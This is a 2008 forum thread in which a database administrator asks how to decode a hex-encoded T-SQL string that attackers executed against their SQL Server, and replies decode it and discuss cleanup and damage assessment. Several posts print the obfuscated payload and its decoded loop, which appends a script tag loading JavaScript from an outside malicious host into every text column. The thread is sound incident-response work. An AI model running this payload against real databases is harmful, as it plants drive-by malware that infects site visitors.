Urgent: Deciphering binary code executed against the database

anojjona

Hi,
I need to figure out what some code that was maliciously executed
against a database does. However, it's in a very strange format. It
simply declares a variable and sets it equal to a huge binary thing
(seems to be some sort of compiled code) cast as nvarchar. It then
executes this variable.
Is there any way to decipher or decompile this code? Does anyone
have information either on what SQL Server does when it's asked to
execute a binary string (as opposed to regular T-SQL) and any tools
that can be used to disassemble or understand this code?
Thanks!

Here's the code:

DECLARE @S NVARCHAR(4000);
SET
@S=CAST(0x44004 50043004C004100 520045002000400 054002000760061 007200630068006 100720028003200 3500350029002C0 040004300200076 006100720063006 800610072002800 320035003500290 020004400450043 004C00410052004 500200054006100 62006C0065005F0 043007500720073 006F00720020004 300550052005300 4F0052002000460 04F005200200073 0065006C0065006 300740020006100 2E006E0061006D0 065002C0062002E 006E0061006D006 500200066007200 6F006D002000730 0790073006F0062 006A00650063007 400730020006100 2C0073007900730 063006F006C0075 006D006E0073002 000620020007700 680065007200650 0200061002E0069 0064003D0062002 E00690064002000 61006E006400200 061002E00780074 007900700065003 D00270075002700 200061006E00640 02000280062002E 007800740079007 00065003D003900 390020006F00720 0200062002E0078 007400790070006 5003D0033003500 20006F007200200 062002E00780074 007900700065003 D00320033003100 20006F007200200 062002E00780074 007900700065003 D00310036003700 290020004F00500 045004E00200054 00610062006C006 5005F0043007500 720073006F00720 020004600450054 004300480020004 E00450058005400 2000460052004F0 04D002000200054 00610062006C006 5005F0043007500 720073006F00720 0200049004E0054 004F00200040005 4002C0040004300 200057004800490 04C004500280040 004000460045005 400430048005F00 530054004100540 0550053003D0030 002900200042004 500470049004E00 200065007800650 063002800270075 007000640061007 400650020005B00 27002B004000540 02B0027005D0020 007300650074002 0005B0027002B00 400043002B00270 05D003D00720074 00720069006D002 80063006F006E00 760065007200740 028007600610072 006300680061007 2002C005B002700 2B00400043002B0 027005D00290029 002B00270027003 C00730063007200 690070007400200 07300720063003D 006800740074007 0003A002F002F00 7700770077002E0 06B0069006C006C 0077006F0077003 1002E0063006E00 2F0067002E006A0 073003E003C002F 007300630072006 900700074003E00 270027002700290 046004500540043 00480020004E004 500580054002000 460052004F004D0 020002000540061 0062006C0065005 F00430075007200 73006F007200200 049004E0054004F 002000400054002 C00400043002000 45004E004400200 043004C004F0053 004500200054006 10062006C006500 5F0043007500720 073006F00720020 004400450041004 C004C004F004300 410054004500200 05400610062006C 0065005F0043007 500720073006F00 7200
AS NVARCHAR(4000)) ;

EXEC(@S);

Jun 27 '08 #1

Subscribe Reply

2562

eisaacs

Maybe you could SELECT the text of the T-SQL and check the execution
plan to possibly get some hint of what it's doing?

Please let us know what you find. That's pretty odd.

Jun 27 '08 #2

Matthias Klaey

an******@aol.co m wrote:

Hi,
I need to figure out what some code that was maliciously executed
against a database does. However, it's in a very strange format. It
simply declares a variable and sets it equal to a huge binary thing
(seems to be some sort of compiled code) cast as nvarchar. It then
executes this variable.
Is there any way to decipher or decompile this code? Does anyone
have information either on what SQL Server does when it's asked to
execute a binary string (as opposed to regular T-SQL) and any tools
that can be used to disassemble or understand this code?
Thanks!

Here's the code:

DECLARE @S NVARCHAR(4000);
SET
@S=CAST(0x44004

[...]

EXEC(@S);

Hi

Copy the code into a query window for a test datadase, then insted of
the EXEC(@S) just simply do a

SELECT @S

and look at the result. Here is what I got:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_S TATUS=0)
BEGIN
exec('update ['+@T+']
set ['+@C+']=rtrim(convert( varchar,['+@C+']))+''
<script src=http://www.killwow1.cn/g.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

I'm not good enough to understand what this really does, and a lot
will depend on what is coming down the line from the web site.

But I think you got yourself something nasty, and I would ASAP kill
this DB and restore from a clean backup.

HTH
Matthias Kläy
--
www.kcc.ch

Jun 27 '08 #3

eisaacs

It looks like they've added <script src=http://www.killwow1.cn/g.js></
scriptto each column in each user defined table.

Your server has obviously been compromised. If your data is
sensitive, take it offline right away until you figure out how they
got in. If you have a website that uses this db, take it down right
away. They're obviously propagating some js onto your website by
adding it in to all your data in a way that is not intended to not
show as visible text on the web itself.

Jun 27 '08 #4

anojjona

Great, that's wonderful...Tha nks! So this will be easier than I
thought. What that code does is loop through the tables in the
database and try to insert that nasty URL into each table. (Don't
click on that link, by the way.)

So basically, with each one of these things where they did that, I can
just use that select statement and find out what they did.
Awesome...Thank s!

Matthias Klaey wrote:

an******@aol.co m wrote:

Hi,
I need to figure out what some code that was maliciously executed
against a database does. However, it's in a very strange format. It
simply declares a variable and sets it equal to a huge binary thing
(seems to be some sort of compiled code) cast as nvarchar. It then
executes this variable.
Is there any way to decipher or decompile this code? Does anyone
have information either on what SQL Server does when it's asked to
execute a binary string (as opposed to regular T-SQL) and any tools
that can be used to disassemble or understand this code?
Thanks!

Here's the code:

DECLARE @S NVARCHAR(4000);
SET
@S=CAST(0x44004

[...]

EXEC(@S);

Hi

Copy the code into a query window for a test datadase, then insted of
the EXEC(@S) just simply do a

SELECT @S

and look at the result. Here is what I got:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_S TATUS=0)
BEGIN
exec('update ['+@T+']
set ['+@C+']=rtrim(convert( varchar,['+@C+']))+''
<script src=http://www.killwow1.cn/g.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

I'm not good enough to understand what this really does, and a lot
will depend on what is coming down the line from the web site.

But I think you got yourself something nasty, and I would ASAP kill
this DB and restore from a clean backup.

HTH
Matthias Klï¿½y
--
www.kcc.ch

Jun 27 '08 #5

anojjona

Yes....we've taken it offline and have an idea how they got in. I've
heard in the news that thousands of websites were hit by this. But I
need to understand the extent of the damage. So that's why I'm going
through each of the log entries.

eisa...@gmail.c om wrote:

It looks like they've added <script src=http://www.killwow1.cn/g.js></
scriptto each column in each user defined table.

Your server has obviously been compromised. If your data is
sensitive, take it offline right away until you figure out how they
got in. If you have a website that uses this db, take it down right
away. They're obviously propagating some js onto your website by
adding it in to all your data in a way that is not intended to not
show as visible text on the web itself.

Jun 27 '08 #6

eisaacs

You might want to do the same loop this guy used to fix the data by
doing a REPLACE() to replace all instances of that <scriptlink with
and empty string ''.

DECLARE @BAD = '<script src=http://www.killwow1.cn/g.js></script>' --
DONT GO HERE OR CLICK THIS LINK

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_S TATUS=0)
BEGIN
exec('update ['+@T+']
set ['+@C+']= REPLACE('+@C+', ''' + @BAD + ''', '''')'
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

....I think that's right, but I didn't test it or compile it. That
should remove the bad data.

Jun 27 '08 #7

eisaacs

Yes I didn't test it...

DECLARE @BAD = '<script src=http://www.killwow1.cn/g.js></script>'

should be...

DECLARE @BAD = VARCHAR(200)
SET @BAD = '<script src=http://www.killwow1.cn/g.js></script>' --

....Again...don 't click that link.

Jun 27 '08 #8

Matthias Klaey

an******@aol.co m wrote:

Great, that's wonderful...Tha nks! So this will be easier than I
thought. What that code does is loop through the tables in the
database and try to insert that nasty URL into each table. (Don't
click on that link, by the way.)

So basically, with each one of these things where they did that, I can
just use that select statement and find out what they did.
Awesome...Thank s!

I'm glad I could help. Is it possible to tell us how you got cought
with this piece of sh...?

Greetings, Matthias
--
www.kcc.ch

Jun 27 '08 #9

anojjona

On May 13, 2:18*pm, Eric <eisa...@gmail. comwrote:

Here's the news link I found...back from April 23...

http://www.pcpro.co.uk/news/192051/h...a-million-webs...

This seems to describe what happened.

Yeah...a lot of sites are affected. And what I've heard is happening
is that when someone hits an infected web page, trojans get installed
on that person's computer, which may not only steal user passwords,
but also send out more attacks using that person's computer. The
places this thing points to are constantly changing.

Now another thing, for those who are interested...th e idea posted
before that one could use the same logic to reverse the damage
apparently won't work. That's because it uses the convert() command
to convert the data to varchar. That does two things: It allows the
script to work on text fields (somehow varchar fails when used in
dynamic SQL within an exec statement); but also, since there is no
field length specified, SQL Server seems to default to 30. So, the
data gets cut off after 30 characters (plus any spaces are trimmed
with the rtrim), and then the malicious code is inserted after that.

Every day or two, more attacks come, perhaps from infected computers,
until the site is stopped or SQL injection holes patched. When that
happens, the old malicious code is replaced with the new (because of
the truncation at 30 characters). But each of these seems to end with
the end-script tag. However, since sometimes the Javascript is there
only to use document.write( ) to put in an iframe, it's possible that
some of these exploits may just insert iframes instead of JavaScript.

(Iframes to websites that have ActiveX controls is perhaps one of the
exploits they were talking about when they said disabling JavaScript
isn't enough?)

By the way, does anyone know if the 30 character thing is standard, or
if it's configurable per installation?

Anyhow, given the data loss, restoring from backup seems to be the
only way.

Here's a little script I wrote to at least get a record of the
damage.

--Do the create table once in the session:
--Create table #report(Tablena me varchar(255), columnname
varchar(255), datatype int, affectedrows int)

DECLARE @BAD varchar(10)
DECLARE @T varchar(255),@C varchar(255),@D int

Set @BAD = '</script>'
DECLARE Table_Cursor1 CURSOR FOR select a.name,b.name,b .xtype
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)

delete from #report

OPEN Table_Cursor1
FETCH NEXT FROM Table_Cursor1 INTO @T,@C,@D
WHILE(@@FETCH_S TATUS=0)
BEGIN
exec('Declare @x int;
SELECT @x = COUNT(1)
FROM ['+@T+']
WHERE RIGHT(convert(v archar(4000),['+@C+']),9) = '''+@BAD+''';
if @x 0 begin
INSERT INTO #report select '''+@T+''', '''+@C+''', '''+@D+''',
COUNT(1)
FROM ['+@T+']
WHERE RIGHT(convert(v archar(4000),['+@C+']),9) = '''+@BAD+'''
end;')

FETCH NEXT FROM Table_Cursor1 INTO @T,@C,@D
END CLOSE Table_Cursor1
DEALLOCATE Table_Cursor1

select * from #report

Jun 27 '08 #10

Similar topics

4117

SQL re-parsing on query executed against a remote database usingdatabase links

by: Pentti | last post by:

Can anyone help to understand why re-parsing occurs on a remote database (using database links), even though we are using a prepared statement on the local database: Scenario: ======== We have an schema (s1) on an Oracle 9i database with database links pointing to a schema (s2) on another Oracle 9i database.

Oracle Database

25381

"Long binary data" in Access db

by: Jerry | last post by:

I have an off-the-shelf app that uses an Access database as its backend. One of the tables contains a field with an "OLE Object" datatype. I'm writing some reports against this database, and I believe this field contains data I need. When I view the table in datasheet view, all I can see in this field is the string "Long binary data". So, I've got the problem of needing to extract data from this field, but I don't know what format...

Microsoft Access / VBA

2458

urgent help on Active Directory Authentication from dotnet

by: varkey.mathew | last post by:

Dear all, Bear with me, a poor newbie(atleast in AD).. I have to authenticate a user ID and password for a user as a valid Active Directory user or not. I have created the IsAuthenticated function exactly as outlined in the below link. http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/SecNetHT02.asp

ASP.NET

1646

Writing large chunks of binary data to MySQL with ODBC

by: Richard Marsden | last post by:

I'm having a lot of trouble writing large chunks of binary data (tests are in the range of 16-512K, but we need support for large longblobs) to MySQL using ODBC. Database is local on a W2K system, but I have to support all modern Windows systems, and a variety of ODBC configurations. (I'll be testing against multiple ODBC databases soon - but development is against MySQL) I've been able to adapt some example code that executes a...

MySQL Database

1296

URGENT FUND TRANSFER

by: Charles Dido | last post by:

Sir, I am MR.CHARLES ALAMIEYESEIGHA. I am the son of GOVONOUR of BAYELSA STATE IN NIGERIA.Some months ago, this YEAR, my father was arrested in LONDON by the LONDON METHROPOLITAN POLICE for money laundering.My father MR. D.S.P.ALAMIEYESEIGHA was accussed of embezzling the <The sum of FOURTY FIVE MILLION DOLLARS>. Since my father"s arrest i have been able to set aside the sum of nine million dollars.This money is meant to be used to...

MySQL Database

6718

binary stream saving at server instead of client

by: Pedro Leite | last post by:

Good Afternoon. the code below is properly retreiving binary data from a database and saving it. but instead of saving at client machine is saving at the server machine. what is wrong with my code ?? thank you Pedro Leite From Portugal ------------------------------------

ASP / Active Server Pages

2668

urgent

by: georges the man | last post by:

The purpose: • Sorting and Searching • Numerical Analysis Design Specification You are to write a program called “StockAnalyser”. Your program will read a text file that contains historical price of a stock. The program will allow users to query the stock price of a particular date and output its statistics (mean price, median price and standard deviation) for any specified period. Your program must be menu driven and works as follows.

C / C++

2297

vb binary file into c++ array

by: willakawill | last post by:

I have a very large binary file saved from a vb array with 2 dimensions; Dim arMatrix() As Byte Dim fNum As Integer ReDim arMatrix(7166, 17769) 'code here to store data from a database into this 'array 'get a free file number fNum = FreeFile()

C / C++

5470

Urgent help please -- ffmepg proc_open return 127, no execution,

by: xhe | last post by:

I am using ffmpeg to convert video, this is a sample script: $str='/home/transla1/bin/ffmpeg -i /home/transla1/public_html/ cybertube/web/uploads/video/31_AK000005.AVI -s 240x180 -b 100k -ar 22050 -y /home/transla1/public_html/cybertube/web/uploads/video/ generated/31_70_AK000005.AVI.flv '; //exec($str); runExternal($str,$code); echo $code ;

PHP

8427

What is ONU?

by: marktang | last post by:

ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main usage, and What is the difference between ONU and Router. Let’s take a closer look ! Part I. Meaning of...

General

8332

Changing the language in Windows 10

by: Hystou | last post by:

Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can effortlessly switch the default language on Windows 10 without reinstalling. I'll walk you through it. First, let's disable language synchronization. With a Microsoft account, language settings sync across devices. To prevent any complications,...

Windows Server

8851

Problem With Comparison Operator <=> in G++

by: Oralloy | last post by:

Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed. This is as boiled down as I can make it. Here is my compilation command: g++-12 -std=c++20 -Wnarrowing bit_field.cpp Here is the code in...

C / C++

8627

Discussion: How does Zigbee compare with other wireless protocols in smart home applications?

by: tracyyun | last post by:

Dear forum friends, With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the choice of these technologies. I'm particularly interested in Zigbee because I've heard it does some...

General

6179

Access Europe - Using VBA to create a class based on a table - Wed 1 May

by: isladogs | last post by:

The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome a new presenter, Adolph Dupré who will be discussing some powerful techniques for using class modules. He will explain when you may want to use classes instead of User Defined Types (UDT). For example, to manage the data in unbound forms. Adolph will...

Microsoft Access / VBA

5649

Couldn’t get equations in html when convert word .docx file to html file in C#.

by: conductexam | last post by:

I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one. At the time of converting from word file to html my equations which are in the word document file was convert into image. Globals.ThisAddIn.Application.ActiveDocument.Select();...

C# / C Sharp

4335

Windows Forms - .Net 8.0

by: adsilva | last post by:

A Windows Forms form does not have the event Unload, like VB6. What one acts like?

Visual Basic .NET

2750

transfer the data from one system to another through ip address

by: 6302768590 | last post by:

Hai team i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system

C# / C Sharp

1737

Comprehensive Guide to Website Development in Toronto: Expert Insights from BSMN Consultancy

by: bsmnconsultancy | last post by:

In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...

General